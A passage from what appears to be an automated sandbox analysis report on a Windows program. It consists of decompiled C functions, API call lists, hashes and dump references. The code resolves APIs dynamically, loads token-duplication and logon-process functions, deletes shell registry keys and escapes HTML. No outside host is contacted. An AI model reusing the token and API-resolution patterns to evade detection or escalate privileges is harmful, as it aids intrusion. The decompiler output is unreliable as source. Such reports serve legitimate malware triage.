                                                                                                                • memset.MSVCRT ref: 00409269
                                                                                                                  • Part of subcall function 00404C08: GetWindowsDirectoryW.KERNEL32(0041C4C0,00000104,?,004092C2,?,?,00000000,00000208,00000000), ref: 00404C1E
                                                                                                                  • Part of subcall function 00404C08: wcscpy.MSVCRT ref: 00404C2E
                                                                                                                • memset.MSVCRT ref: 004092B1
                                                                                                                • memcpy.MSVCRT ref: 004092CC
                                                                                                                • wcscat.MSVCRT ref: 004092D8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                                • String ID: \systemroot
                                                                                                                • API String ID: 4173585201-1821301763
                                                                                                                • Opcode ID: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction ID: 02e88fdf4673b821ef0819f9ed59a437f9dc8f0c8d82ea34f2c30dfda84fedc2
                                                                                                                • Opcode Fuzzy Hash: 60d3348394c7dd9062b0c25d43eb08d04abc05a8b491f8318e68017d15ed3876
                                                                                                                • Instruction Fuzzy Hash: 0D2198A680530479E614F7A14C8ADAB73ACDF55714F2049BFB515B20C3EB3CA94447AE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00409C70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 63librarystringloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 48%
                                                                                                                			E00409C70(signed int* _a4) {
				signed int _v8;
				_Unknown_base(*)()* _v12;
				char* _v16;
				int _v18;
				signed int _v20;
				char _v36;
				intOrPtr* _t21;
				struct HINSTANCE__* _t22;
				signed int _t23;
				signed int _t24;
				_Unknown_base(*)()* _t26;
				char* _t28;
				int _t31;

				_t21 = _a4;
				if( *_t21 == 0) {
					_t22 = GetModuleHandleW(L"kernel32.dll");
					_v8 = _t22;
					_t23 = GetProcAddress(_t22, "GetProcAddress");
					 *_a4 = _t23;
					_t24 = _t23 ^ _v8;
					if((_t24 & 0xfff00000) != 0) {
						_t26 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "LdrGetProcedureAddress");
						_v20 = _v20 & 0x00000000;
						_v12 = _t26;
						asm("stosd");
						asm("stosw");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsw");
						_t28 =  &_v36;
						asm("movsb");
						_v16 = _t28;
						_v20 = strlen(_t28);
						_t31 = strlen( &_v36);
						_v18 = _t31;
						_t24 = _v12(_v8,  &_v20, 0, _a4);
					}
					return _t24;
				}
				return _t21;
			}
















                                                                                                                0x00409c73
                                                                                                                0x00409c7c
                                                                                                                0x00409c90
                                                                                                                0x00409c9f
                                                                                                                0x00409ca2
                                                                                                                0x00409ca7
                                                                                                                0x00409ca9
                                                                                                                0x00409cb1
                                                                                                                0x00409cc0
                                                                                                                0x00409cc2
                                                                                                                0x00409cc7
                                                                                                                0x00409ccf
                                                                                                                0x00409cd0
                                                                                                                0x00409cd7
                                                                                                                0x00409cd8
                                                                                                                0x00409cd9
                                                                                                                0x00409cda
                                                                                                                0x00409cdc
                                                                                                                0x00409ce0
                                                                                                                0x00409ce1
                                                                                                                0x00409ce9
                                                                                                                0x00409cf1
                                                                                                                0x00409cfb
                                                                                                                0x00409d08
                                                                                                                0x00409d08
                                                                                                                0x00000000
                                                                                                                0x00409d0d
                                                                                                                0x00409d0f

                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409C90
                                                                                                                • GetProcAddress.KERNEL32(00000000,GetProcAddress), ref: 00409CA2
                                                                                                                • GetModuleHandleW.KERNEL32(ntdll.dll,?,?,?,?,?,?,?,?,?,0040A4D4,?), ref: 00409CB8
                                                                                                                • GetProcAddress.KERNEL32(00000000,LdrGetProcedureAddress), ref: 00409CC0
                                                                                                                • strlen.MSVCRT ref: 00409CE4
                                                                                                                • strlen.MSVCRT ref: 00409CF1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProcstrlen
                                                                                                                • String ID: GetProcAddress$LdrGetProcedureAddress$kernel32.dll$ntdll.dll
                                                                                                                • API String ID: 1027343248-2054640941
                                                                                                                • Opcode ID: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction ID: e4d1d00a07c818a936495f608e4711dda3cd6d1ffd1a72fa6585e5ef64b3ff18
                                                                                                                • Opcode Fuzzy Hash: 2c8eeb2815ee5c5b2ea885c3a2d3967712a9a4d351cacca76f1b157eee6792fc
                                                                                                                • Instruction Fuzzy Hash: A311FE72910218EADB01EFE5DC45ADEBBB9EF48710F10446AE900B7250D7B5AA04CBA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040289F, Relevance: 17.5, APIs: 5, Strings: 5, Instructions: 25libraryloaderCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040289F(intOrPtr* __esi) {
				void* _t9;
				struct HINSTANCE__* _t10;
				_Unknown_base(*)()* _t14;

				if( *(__esi + 0x10) == 0) {
					_t10 = LoadLibraryW(L"advapi32.dll");
					 *(__esi + 0x10) = _t10;
					 *((intOrPtr*)(__esi + 0xc)) = GetProcAddress(_t10, "CreateProcessWithLogonW");
					 *((intOrPtr*)(__esi)) = GetProcAddress( *(__esi + 0x10), "CreateProcessWithTokenW");
					 *((intOrPtr*)(__esi + 4)) = GetProcAddress( *(__esi + 0x10), "OpenProcessToken");
					_t14 = GetProcAddress( *(__esi + 0x10), "DuplicateTokenEx");
					 *(__esi + 8) = _t14;
					return _t14;
				}
				return _t9;
			}






                                                                                                                0x004028a3
                                                                                                                0x004028ab
                                                                                                                0x004028bd
                                                                                                                0x004028ca
                                                                                                                0x004028d7
                                                                                                                0x004028e3
                                                                                                                0x004028e6
                                                                                                                0x004028e8
                                                                                                                0x00000000
                                                                                                                0x004028eb
                                                                                                                0x004028ec

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                • GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                • GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                • GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$LibraryLoad
                                                                                                                • String ID: CreateProcessWithLogonW$CreateProcessWithTokenW$DuplicateTokenEx$OpenProcessToken$advapi32.dll
                                                                                                                • API String ID: 2238633743-1970996977
                                                                                                                • Opcode ID: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction ID: fe34eb2af2a63a360b7e1287e200b812ce4d940bd8def4616d2569e5b7a8a532
                                                                                                                • Opcode Fuzzy Hash: 736db8e764dc1c3a829da2c2b507ec82b50fe6502085f5c463c853d5cc7dc2a7
                                                                                                                • Instruction Fuzzy Hash: AEF09874A40708EBCB30EFB59D49B07BAF5FB94710B114F2AE49662690D7B8A004CF14
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004045BA, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 63registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 39%
                                                                                                                			E004045BA(void* __ebx, void* __ecx, void* __eflags) {
				void* _v8;
				void _v2054;
				short _v2056;
				void _v4102;
				short _v4104;
				signed int _t28;
				void* _t34;

				E0040B550(0x1004, __ecx);
				_t36 = 0;
				if(E004043F8( &_v8, 0x2001f) == 0) {
					_v2056 = 0;
					memset( &_v2054, 0, 0x7fe);
					_v4104 = 0;
					memset( &_v4102, 0, 0x7fe);
					_t34 = __ebx + 0x20a;
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s\\command");
					_push(0x3ff);
					_push( &_v2056);
					L0040B1EC();
					_push(_t34);
					_push(__ebx);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v4104);
					L0040B1EC();
					RegDeleteKeyW(_v8,  &_v2056);
					_t28 = RegDeleteKeyW(_v8,  &_v4104);
					asm("sbb esi, esi");
					_t36 =  ~_t28 + 1;
					RegCloseKey(_v8);
				}
				return _t36;
			}










                                                                                                                0x004045c2
                                                                                                                0x004045d1
                                                                                                                0x004045da
                                                                                                                0x004045ef
                                                                                                                0x004045f6
                                                                                                                0x00404604
                                                                                                                0x0040460b
                                                                                                                0x00404610
                                                                                                                0x00404616
                                                                                                                0x00404617
                                                                                                                0x00404618
                                                                                                                0x00404628
                                                                                                                0x00404629
                                                                                                                0x0040462a
                                                                                                                0x0040462f
                                                                                                                0x00404630
                                                                                                                0x00404631
                                                                                                                0x0040463c
                                                                                                                0x0040463d
                                                                                                                0x0040463e
                                                                                                                0x00404656
                                                                                                                0x00404662
                                                                                                                0x0040466b
                                                                                                                0x0040466d
                                                                                                                0x0040466e
                                                                                                                0x00404674
                                                                                                                0x00404679

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Delete_snwprintfmemset$Close
                                                                                                                • String ID: %s\shell\%s$%s\shell\%s\command
                                                                                                                • API String ID: 1018939227-3575174989
                                                                                                                • Opcode ID: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction ID: ac83cb79e3d5854fe24d0bbfc9a3a323e310d753dc8b3985e5e0c668aff5e890
                                                                                                                • Opcode Fuzzy Hash: eb03526f09382e5b45fdf89eb122c4fe483ff347ce29f2f8469749f4b5604f89
                                                                                                                • Instruction Fuzzy Hash: 2F115E72800128BACB2097958D45ECBBABCEF49794F0001B6BA08F2151D7745F449AED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040313D, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 58%
                                                                                                                			E0040313D(void* __ecx) {
				intOrPtr _v8;
				char _v12;
				struct HWND__* _t6;
				_Unknown_base(*)()* _t11;
				struct HWND__* _t15;
				void* _t20;
				struct HINSTANCE__* _t23;

				_v12 = 8;
				_v8 = 0xff;
				_t15 = 0;
				_t20 = 0;
				_t23 = LoadLibraryW(L"comctl32.dll");
				if(_t23 == 0) {
					L5:
					__imp__#17();
					_t6 = 1;
					L6:
					if(_t6 != 0) {
						return 1;
					} else {
						MessageBoxW(_t6, L"Error: Cannot load the common control classes.", L"Error", 0x30);
						return 0;
					}
				}
				_t11 = GetProcAddress(_t23, "InitCommonControlsEx");
				if(_t11 != 0) {
					_t20 = 1;
					_t15 =  *_t11( &_v12);
				}
				FreeLibrary(_t23);
				if(_t20 == 0) {
					goto L5;
				} else {
					_t6 = _t15;
					goto L6;
				}
			}










                                                                                                                0x0040314a
                                                                                                                0x00403151
                                                                                                                0x00403158
                                                                                                                0x0040315a
                                                                                                                0x00403162
                                                                                                                0x00403166
                                                                                                                0x00403190
                                                                                                                0x00403190
                                                                                                                0x00403198
                                                                                                                0x00403199
                                                                                                                0x0040319e
                                                                                                                0x004031bb
                                                                                                                0x004031a0
                                                                                                                0x004031ad
                                                                                                                0x004031b6
                                                                                                                0x004031b6
                                                                                                                0x0040319e
                                                                                                                0x0040316e
                                                                                                                0x00403176
                                                                                                                0x0040317c
                                                                                                                0x0040317f
                                                                                                                0x0040317f
                                                                                                                0x00403182
                                                                                                                0x0040318a
                                                                                                                0x00000000
                                                                                                                0x0040318c
                                                                                                                0x0040318c
                                                                                                                0x00000000
                                                                                                                0x0040318c

                                                                                                                APIs
                                                                                                                • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 0040315C
                                                                                                                • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 0040316E
                                                                                                                • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403182
                                                                                                                • #17.COMCTL32(?,00000002,?,?,?,0040854B,00000000,?,00000002,?,0040B45E,00000000,?,0000000A), ref: 00403190
                                                                                                                • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 004031AD
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                • API String ID: 2780580303-317687271
                                                                                                                • Opcode ID: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction ID: 155fb52d9805f4d7e0650ae201b0fcd9156dc3619c14d31e00ff2d1348fe2513
                                                                                                                • Opcode Fuzzy Hash: 8a767b45678d51ce81ad3698ee4bc8fb41a4868eaadb3cd6c21e495a7a6e88df
                                                                                                                • Instruction Fuzzy Hash: 5A01D672751201EAD3115FB4AC89F7B7EACDF4974AB00023AF505F51C0DA78DA01869C
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404DA9, Relevance: 15.1, APIs: 10, Instructions: 111COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00404DA9(void* __edx, struct HWND__* _a4, signed int _a8) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				struct tagRECT _v28;
				struct tagRECT _v44;
				int _t50;
				long _t61;
				struct HDC__* _t63;
				intOrPtr _t65;
				intOrPtr _t68;
				struct HWND__* _t71;
				intOrPtr _t72;
				void* _t73;
				int _t74;
				int _t80;
				int _t83;

				_t73 = __edx;
				_v8 = 0;
				_v12 = 0;
				_t74 = GetSystemMetrics(0x11);
				_t80 = GetSystemMetrics(0x10);
				if(_t74 == 0 || _t80 == 0) {
					_t63 = GetDC(0);
					_t80 = GetDeviceCaps(_t63, 8);
					_t74 = GetDeviceCaps(_t63, 0xa);
					ReleaseDC(0, _t63);
				}
				GetWindowRect(_a4,  &_v44);
				if((_a8 & 0x00000004) != 0) {
					_t71 = GetParent(_a4);
					if(_t71 != 0) {
						_v28.left = _v28.left & 0x00000000;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						GetWindowRect(_t71,  &_v28);
						_t61 = _v28.left;
						_t72 = _v28.top;
						_t80 = _v28.right - _t61 + 1;
						_t74 = _v28.bottom - _t72 + 1;
						_v8 = _t61;
						_v12 = _t72;
					}
				}
				_t65 = _v44.right;
				if((_a8 & 0x00000001) == 0) {
					asm("cdq");
					_t83 = (_v44.left - _t65 + _t80 - 1 - _t73 >> 1) + _v8;
				} else {
					_t83 = 0;
				}
				_t68 = _v44.bottom;
				if((_a8 & 0x00000002) != 0) {
					L11:
					_t50 = 0;
					goto L12;
				} else {
					asm("cdq");
					_t50 = (_v44.top - _t68 + _t74 - 1 - _t73 >> 1) + _v12;
					if(_t50 >= 0) {
						L12:
						if(_t83 < 0) {
							_t83 = 0;
						}
						return MoveWindow(_a4, _t83, _t50, _t65 - _v44.left + 1, _t68 - _v44.top + 1, 1);
					}
					goto L11;
				}
			}


















                                                                                                                0x00404da9
                                                                                                                0x00404dbc
                                                                                                                0x00404dbf
                                                                                                                0x00404dc6
                                                                                                                0x00404dcc
                                                                                                                0x00404dce
                                                                                                                0x00404de1
                                                                                                                0x00404deb
                                                                                                                0x00404df2
                                                                                                                0x00404df4
                                                                                                                0x00404df4
                                                                                                                0x00404e07
                                                                                                                0x00404e0d
                                                                                                                0x00404e18
                                                                                                                0x00404e1c
                                                                                                                0x00404e1e
                                                                                                                0x00404e27
                                                                                                                0x00404e28
                                                                                                                0x00404e29
                                                                                                                0x00404e2f
                                                                                                                0x00404e31
                                                                                                                0x00404e37
                                                                                                                0x00404e41
                                                                                                                0x00404e42
                                                                                                                0x00404e43
                                                                                                                0x00404e46
                                                                                                                0x00404e46
                                                                                                                0x00404e1c
                                                                                                                0x00404e4d
                                                                                                                0x00404e50
                                                                                                                0x00404e5f
                                                                                                                0x00404e66
                                                                                                                0x00404e52
                                                                                                                0x00404e52
                                                                                                                0x00404e52
                                                                                                                0x00404e6d
                                                                                                                0x00404e70
                                                                                                                0x00404e85
                                                                                                                0x00404e85
                                                                                                                0x00000000
                                                                                                                0x00404e72
                                                                                                                0x00404e7b
                                                                                                                0x00404e80
                                                                                                                0x00404e83
                                                                                                                0x00404e87
                                                                                                                0x00404e89
                                                                                                                0x00404e8b
                                                                                                                0x00404e8b
                                                                                                                0x00404ea8
                                                                                                                0x00404ea8
                                                                                                                0x00000000
                                                                                                                0x00404e83

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC2
                                                                                                                • GetSystemMetrics.USER32 ref: 00404DC8
                                                                                                                • GetDC.USER32(00000000), ref: 00404DD5
                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 00404DE6
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00404DED
                                                                                                                • ReleaseDC.USER32 ref: 00404DF4
                                                                                                                • GetWindowRect.USER32 ref: 00404E07
                                                                                                                • GetParent.USER32(?), ref: 00404E12
                                                                                                                • GetWindowRect.USER32 ref: 00404E2F
                                                                                                                • MoveWindow.USER32(?,?,00000000,?,?,00000001), ref: 00404E9E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 2163313125-0
                                                                                                                • Opcode ID: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction ID: fcbc432c8b17a9ec8ea4481816a0c35ab2ad0e4d246cd47a42b035ba49fba047
                                                                                                                • Opcode Fuzzy Hash: 4dffefead20de85e77f0f51142770c5402b7e424f6febd7d4428018e65d0f7f4
                                                                                                                • Instruction Fuzzy Hash: D63197B1900219AFDB10DFB8CD84AEEBBB8EB44314F054179EE05B7291D674AD418B94
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00406398, Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 88%
                                                                                                                			E00406398(void* __eflags, wchar_t* _a4) {
				void* __esi;
				void* _t3;
				int _t6;

				_t3 = E00404AAA(_a4);
				if(_t3 != 0) {
					wcscpy(0x40fb90, _a4);
					wcscpy(0x40fda0, L"general");
					_t6 = GetPrivateProfileIntW(0x40fda0, L"rtl", 0, 0x40fb90);
					asm("sbb eax, eax");
					 *0x40fe28 =  ~(_t6 - 1) + 1;
					E00405F14(0x40fe30, L"charset", 0x3f);
					E00405F14(0x40feb0, L"TranslatorName", 0x3f);
					return E00405F14(0x40ff30, L"TranslatorURL", 0xff);
				}
				return _t3;
			}






                                                                                                                0x0040639c
                                                                                                                0x004063a4
                                                                                                                0x004063b2
                                                                                                                0x004063c2
                                                                                                                0x004063d3
                                                                                                                0x004063dc
                                                                                                                0x004063eb
                                                                                                                0x004063f0
                                                                                                                0x00406401
                                                                                                                0x00000000
                                                                                                                0x0040641e
                                                                                                                0x0040641f

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00404AAA: GetFileAttributesW.KERNEL32(?,004063A1,?,00406458,00000000,?,00000000,00000208,?), ref: 00404AAE
                                                                                                                • wcscpy.MSVCRT ref: 004063B2
                                                                                                                • wcscpy.MSVCRT ref: 004063C2
                                                                                                                • GetPrivateProfileIntW.KERNEL32 ref: 004063D3
                                                                                                                  • Part of subcall function 00405F14: GetPrivateProfileStringW.KERNEL32 ref: 00405F30
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                • API String ID: 3176057301-2039793938
                                                                                                                • Opcode ID: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction ID: e4db3026d56c82c297763cb3084dd600e002768b85b35a6fcc1e36585c673314
                                                                                                                • Opcode Fuzzy Hash: 306b450fceaff8e5fb1a61115cabefaaa5d3384cfa9206dbc7cfbd8e55437a99
                                                                                                                • Instruction Fuzzy Hash: E2F09032EA422276EA203321DC4BF2B2555CBD1B18F15417BBA08BA5D3DB7C580645ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040ADF1, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 16%
                                                                                                                			E0040ADF1(signed short* __eax, void* __ecx) {
				void* _t2;
				signed short* _t3;
				void* _t7;
				void* _t8;
				void* _t10;

				_t3 = __eax;
				_t8 = __ecx;
				_t7 = 8;
				while(1) {
					_t2 =  *_t3 & 0x0000ffff;
					if(_t2 != 0x3c) {
						goto L3;
					}
					_push(_t7);
					_push(L"&lt;");
					L14:
					_t2 = memcpy(_t8, ??, ??);
					_t10 = _t10 + 0xc;
					_t8 = _t8 + _t7;
					L16:
					if( *_t3 != 0) {
						_t3 =  &(_t3[1]);
						continue;
					}
					return _t2;
					L3:
					if(_t2 != 0x3e) {
						if(_t2 != 0x22) {
							if((_t2 & 0x0000ffff) != 0xffffffb0) {
								if(_t2 != 0x26) {
									if(_t2 != 0xa) {
										 *_t8 = _t2;
										_t8 = _t8 + 2;
									} else {
										_push(_t7);
										_push(L"<br>");
										goto L14;
									}
								} else {
									_push(0xa);
									_push(L"&amp;");
									goto L11;
								}
							} else {
								_push(0xa);
								_push(L"&deg;");
								L11:
								_t2 = memcpy(_t8, ??, ??);
								_t10 = _t10 + 0xc;
								_t8 = _t8 + 0xa;
							}
						} else {
							_t2 = memcpy(_t8, L"&quot;", 0xc);
							_t10 = _t10 + 0xc;
							_t8 = _t8 + 0xc;
						}
					} else {
						_push(_t7);
						_push(L"&gt;");
						goto L14;
					}
					goto L16;
				}
			}








                                                                                                                0x0040adf6
                                                                                                                0x0040adf8
                                                                                                                0x0040adfa
                                                                                                                0x0040adfb
                                                                                                                0x0040adfb
                                                                                                                0x0040ae02
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040ae04
                                                                                                                0x0040ae05
                                                                                                                0x0040ae6d
                                                                                                                0x0040ae6e
                                                                                                                0x0040ae73
                                                                                                                0x0040ae76
                                                                                                                0x0040ae7f
                                                                                                                0x0040ae83
                                                                                                                0x0040ae86
                                                                                                                0x00000000
                                                                                                                0x0040ae86
                                                                                                                0x0040ae8f
                                                                                                                0x0040ae0c
                                                                                                                0x0040ae10
                                                                                                                0x0040ae1e
                                                                                                                0x0040ae3b
                                                                                                                0x0040ae4a
                                                                                                                0x0040ae65
                                                                                                                0x0040ae7a
                                                                                                                0x0040ae7e
                                                                                                                0x0040ae67
                                                                                                                0x0040ae67
                                                                                                                0x0040ae68
                                                                                                                0x00000000
                                                                                                                0x0040ae68
                                                                                                                0x0040ae4c
                                                                                                                0x0040ae4c
                                                                                                                0x0040ae4e
                                                                                                                0x00000000
                                                                                                                0x0040ae4e
                                                                                                                0x0040ae3d
                                                                                                                0x0040ae3d
                                                                                                                0x0040ae3f
                                                                                                                0x0040ae53
                                                                                                                0x0040ae54
                                                                                                                0x0040ae59
                                                                                                                0x0040ae5c
                                                                                                                0x0040ae5c
                                                                                                                0x0040ae20
                                                                                                                0x0040ae28
                                                                                                                0x0040ae2d
                                                                                                                0x0040ae30
                                                                                                                0x0040ae30
                                                                                                                0x0040ae12
                                                                                                                0x0040ae12
                                                                                                                0x0040ae13
                                                                                                                0x00000000
                                                                                                                0x0040ae13
                                                                                                                0x00000000
                                                                                                                0x0040ae10

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000004.00000002.684602630.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000004.00000002.684590865.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684685331.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684716823.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000004.00000002.684756322.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpy
                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                • Opcode ID: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction ID: 19d6e8f9099fa728be05f60bd268fa70c064aa74fae363856be53b9475c854a8
                                                                                                                • Opcode Fuzzy Hash: 5ac42ab936778c43cffeb329e7503942126618bb1fc858f85522d1c9693fd2c2
                                                                                                                • Instruction Fuzzy Hash: FE01D25AEC8320A5EA302055DC86F7B2514D7B2B51FA5013BB986392C1E2BD09A7A1DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004041EB, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 197fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004041EB(intOrPtr* __ecx, intOrPtr _a4, void* _a8, intOrPtr _a12) {
				struct HDWP__* _v8;
				intOrPtr* _v12;
				void _v534;
				short _v536;
				void* __ebx;
				void* __edi;
				intOrPtr _t42;
				intOrPtr* _t95;
				RECT* _t96;

				_t95 = __ecx;
				_v12 = __ecx;
